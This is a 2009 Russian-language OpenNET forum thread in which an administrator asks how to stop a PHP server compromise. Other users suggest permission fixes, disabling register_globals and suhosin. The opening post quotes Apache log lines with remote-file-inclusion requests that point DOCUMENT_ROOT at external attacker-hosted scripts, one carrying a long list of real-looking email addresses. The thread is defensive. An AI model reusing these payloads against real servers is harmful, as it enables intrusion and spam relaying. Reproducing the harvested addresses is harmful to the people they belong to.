форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка

Вариант для распечатки		Пред. тема | След. тема
Форумы OpenNET: Виртуальная конференция (Public)
Изначальное сообщение		[ Отслеживать ]

"Продолжение взлома сервера (проблема PHP)"

Сообщение от Дмитрий (??) on 25-Фев-09, 16:03

Продолжение темы http://www.opennet.me/openforum/vsluhforumID1/84188.html По логам апача убедился что ломают именно через php. Причем используют как минимум 2 уязвимости. 1-ю:  register_globals (которую добрые сайтописцы заставили держать включенной :(:(:() я закрыл. Правда теперь не работает редактирование инфы на сайте, но т.к. оно делается только из канторы, то включать буду "по требованию". А вот со второй непонятки. В логе есть строка 196.3.183.73 - - [25/Feb/2009:14:26:16 +0300] "GET /?_SERVER%5bDOCUMENT_ROOT%5d=http://www.defcel.fr/fddvf.txt??? HTTP/1.1" 200 3279 Где как я выяснил http://www.defcel.fr/fddvf.txt - php скрипт, который занимается рассылкой спама от адреса apache@name-machine.domain-name.spb.ru. В очереди скапливается куча сообщений (вчера грохнул почти 1500). Еще в логе есть подобная инфа: 189.73.86.45 - - [22/Feb/2009:01:25:19 +0300] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://axispropertyinvestment.com/deals_pdf/test.txt?&sendto... gida@gida.com.br+gidantas@dglnet.com.br+gidantas@dglnetcom.br+gidapulga@hoymail.com+gidaro@net-k.com.br+giddings@rconnect.com+gidds@iafrica.com+gideao@svn.com .svn+gidel@uninet.com.br+gidelvan@seicom.com.br+gidelvan@vento.com.br+gideon@autobahn.org+gideon@cpunet.com.br+gideon@michigandental.com+gideone.lima@bol.br+g idev@gidev.com.br+gideval@bnb.gov.br+gidiaz@na.cokecce.com+gidiel@portoweb.com.br+gidion@gidion.com.br+gidion@netville.com.br+gidioni@zipmail.coj+gidogawa@btm .com.br+gidon.albert@viacom.com+gidonini@sercomtel.com.br+gidrumon@prover.com.br+gidurbh11@caixa.gov.br+gidurbh3@caixa.gov.br+gidurbh5@caixa.gov.br HTTP/1.1" 200 2293 Подскажите, как надо настроить PHP, чтобы избежать подобной гадости? Сейчас копаю инфу на тему запуска апача в chroot-е

Высказать мнение | Ответить | Правка | Cообщить модератору

Сообщения по теме

[Сортировка по времени | RSS]

1. "Продолжение взлома сервера (проблема PHP)"

Сообщение от LS (ok) on 25-Фев-09, 17:19

какие из известных пхп прикладов на твоем апаче крутятся?

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

2. "Продолжение взлома сервера (проблема PHP)"

Сообщение от LS (ok) on 25-Фев-09, 17:23

>189.73.86.45 - - [22/Feb/2009:01:25:19 +0300] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http: а какого хрена у тебя это место вообще для записи из апача доступно. разве не ясно что все данные надо хранить ВНЕ структуры каталогов веб-сервера? тут нах о chroot речь даже не идет. тебе через апач пишут на винт. вопрос - зачем ты дал этому процессу возможность записи в корневой каталог твоих виртуальных серверов? ему оттуда только читать надо. а весь нормальный софт располагает свои каталоги с данными за пределами этого корня.

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

	7. "Продолжение взлома сервера (проблема PHP)"
	Сообщение от Дмитрий (??) on 26-Фев-09, 10:13
	>[оверквотинг удален] > >а какого хрена у тебя это место вообще для записи из апача >доступно. разве не ясно что все данные надо хранить ВНЕ структуры >каталогов веб-сервера? > >тут нах о chroot речь даже не идет. тебе через апач пишут >на винт. вопрос - зачем ты дал этому процессу возможность записи >в корневой каталог твоих виртуальных серверов? ему оттуда только читать надо. >а весь нормальный софт располагает свои каталоги с данными за пределами >этого корня. Апач не имеет права доступа записи на сайт (Owner:Group вообще не апачные). Право записи имеет только FTP узверь (от которого и заливался сайт). В прошлой теме я и писал, что засланные казачки обнаруживались в tmp дирах (/tmp и /var/tmp). Подскажите, как моно запретить апачу какую либо запись выше DOCUMENT_ROOT? Т.к. одна дир в сайте требует наличия этого права. Попозже постараюсь выяснить насколько это необходимо.
	Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

	8. "Продолжение взлома сервера (проблема PHP)"
	Сообщение от Дмитрий (??) on 26-Фев-09, 10:16
	PS: Сейчас проверил и ни одна дира не имеет во владельцах апача, а права на сайтовые диры выставлены как 755
	Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

3. "Продолжение взлома сервера (проблема PHP)"

Сообщение от LS (ok) on 25-Фев-09, 17:38

короче мне кажется тут  тривиальная проблема chmod и chown, на которую ты должен потратить некоторое количество времени

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

	9. "Продолжение взлома сервера (проблема PHP)"
	Сообщение от Дмитрий (??) on 26-Фев-09, 10:18
	>короче мне кажется тут  тривиальная проблема chmod и chown, на которую >ты должен потратить некоторое количество времени owner:group не апачевские права 755
	Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

4. "Продолжение взлома сервера (проблема PHP)"

Сообщение от angra (ok) on 26-Фев-09, 04:22

Любопытный способ, странно только что register_globals off это не закрыл. Самое время обновить пых и доставить на него suhosin. Потом посмотреть сколько из хостящихся у вас сайтов не переживут встречи с suhosin и проклясть пых с его пыхобыдлокодерами :)

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

	5. "Продолжение взлома сервера (проблема PHP)"
	Сообщение от Oyyo on 26-Фев-09, 09:16
	>Любопытный способ, странно только что register_globals off это не закрыл. Самое время >обновить пых и доставить на него suhosin. Потом посмотреть сколько из >хостящихся у вас сайтов не переживут встречи с suhosin и проклясть >пых с его пыхобыдлокодерами :) angra +1 +1
	Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

	6. "Продолжение взлома сервера (проблема PHP)"
	Сообщение от Дмитрий (??) on 26-Фев-09, 10:08
	>Любопытный способ, странно только что register_globals off это не закрыл. Самое время >обновить пых и доставить на него suhosin. Потом посмотреть сколько из >хостящихся у вас сайтов не переживут встречи с suhosin и проклясть >пых с его пыхобыдлокодерами :) В том то и дело, что (как я и написал выше) register_globals был открыт по требованию сайтописцев (убывать таких надо, если кому интересно, то это некий беляков, с ранее одноименным сайтом с окончанием на ком :(:(:(:(:(:( ). Если отключить этот парам, то один сайт из 3-х вообще отказывался грузится. Вчера я немного полабал с его пхп текстом, и (по аналогии с 2-я рабочими) заставил и его работать с register_globals off. Но заставить работать админскую часть сайта пока не удалось. Буду лабать дальше. Подскажите, а что это за зверь suhosin? И с чем его едят?
	Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

10. "Продолжение взлома сервера (проблема PHP)"

Сообщение от Дмитрий (??) on 27-Фев-09, 09:33

Если кому еще интересно, нашел интересную статью по теме http://www.opennet.me/openforum/vsluhforumID1/84250.html

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить	Индекс форумов | Темы | Пред. тема | След. тема
Оцените тред (1=ужас, 5=супер)? [ 1 | 2 | 3 | 4 | 5 ] [Рекомендовать для помещения в FAQ]